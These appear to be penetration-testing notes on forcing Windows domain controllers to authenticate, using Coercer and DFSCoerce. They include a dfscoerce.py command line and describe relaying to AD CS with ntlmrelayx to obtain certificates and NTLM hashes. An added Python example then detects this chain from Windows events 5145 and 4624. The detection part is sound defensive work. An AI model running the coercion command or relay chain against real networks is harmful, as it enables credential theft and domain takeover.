Secondary Categories: 02-Lateral Movement, 02-Privilege Escalation, 02-Credential Access


Coercing authentication from internal systems has usually been pretty successful on past engagements.

Coercer

This tool will automatically coerce a Windows server to authenticate to an arbitrary machine using the following methods:

DFSCoerce

This method is very successful and leverages the MS-DFSNM protocol to force the domain controller to authenticate to a specified IP address.

This can be coupled with ntlmrelayx to relay to other services like AD CS to obtain a certificate and ultimately retrieve NTLM hashes.

python3 dfscoerce.py -u jsmith -d corp.local $dc $listener
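
A detection-side view of the DFSCoerce plus relay chain described above, as an added example that is not part of the original notes: it flags opens of the MS-DFSNM named pipe (`netdfs`) on a DC from hosts that do not manage DFS, then pairs each with a network logon of that DC's machine account arriving from an address that is not the DC. The events are constructed, the field names follow Security events 5145 and 4624, and the `DC_IPS` inventory, `DFS_ADMIN_HOSTS` allowlist and 60-second window are assumptions; 5145 is only logged when Detailed File Share auditing is enabled.

```python
from datetime import datetime, timedelta

# Assumed inventory and allowlist (hypothetical values for this example).
DC_IPS = {"DC01$": "10.0.0.10"}      # DC machine account -> its real address
DFS_ADMIN_HOSTS = {"10.0.0.20"}      # hosts expected to manage DFS namespaces
WINDOW = timedelta(seconds=60)       # max gap between pipe open and relayed logon

# Constructed sample events; keys mirror Security events 5145 and 4624.
EVENTS = [
    {"EventID": 5145, "Time": "2024-05-01T10:00:00", "Computer": "DC01",
     "SubjectUserName": "jsmith", "IpAddress": "10.0.5.77",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "netdfs"},
    {"EventID": 4624, "Time": "2024-05-01T10:00:03", "Computer": "CA01",
     "TargetUserName": "DC01$", "LogonType": 3, "IpAddress": "10.0.5.77"},
    {"EventID": 5145, "Time": "2024-05-01T11:00:00", "Computer": "DC01",
     "SubjectUserName": "dfsadmin", "IpAddress": "10.0.0.20",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "netdfs"},
    {"EventID": 4624, "Time": "2024-05-01T11:30:00", "Computer": "FS01",
     "TargetUserName": "DC01$", "LogonType": 3, "IpAddress": "10.0.0.10"},
]

def _ts(event):
    return datetime.fromisoformat(event["Time"])

def netdfs_pipe_opens(events):
    """5145: a non-allowlisted host opens the MS-DFSNM pipe over IPC$."""
    return [e for e in events
            if e["EventID"] == 5145
            and e["ShareName"].upper().endswith("IPC$")
            and e["RelativeTargetName"].lower() == "netdfs"
            and e["IpAddress"] not in DFS_ADMIN_HOSTS]

def relayed_dc_logons(events):
    """4624 type 3: a DC machine account logs on from an address that is not the DC."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 3
            and e["TargetUserName"] in DC_IPS
            and e["IpAddress"] != DC_IPS[e["TargetUserName"]]]

def correlate(events):
    """Pair each suspicious pipe open with a relayed logon of the same DC inside WINDOW."""
    alerts = []
    for p in netdfs_pipe_opens(events):
        for lg in relayed_dc_logons(events):
            if (lg["TargetUserName"].rstrip("$").lower() == p["Computer"].lower()
                    and timedelta(0) <= _ts(lg) - _ts(p) <= WINDOW):
                alerts.append({"dc": p["Computer"], "caller": p["SubjectUserName"],
                               "relayed_to": lg["Computer"], "relay_ip": lg["IpAddress"]})
    return alerts
```

Either signal is worth alerting on by itself; the second one (a DC machine account authenticating from a non-DC address) also catches relays that were triggered through other coercion methods.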
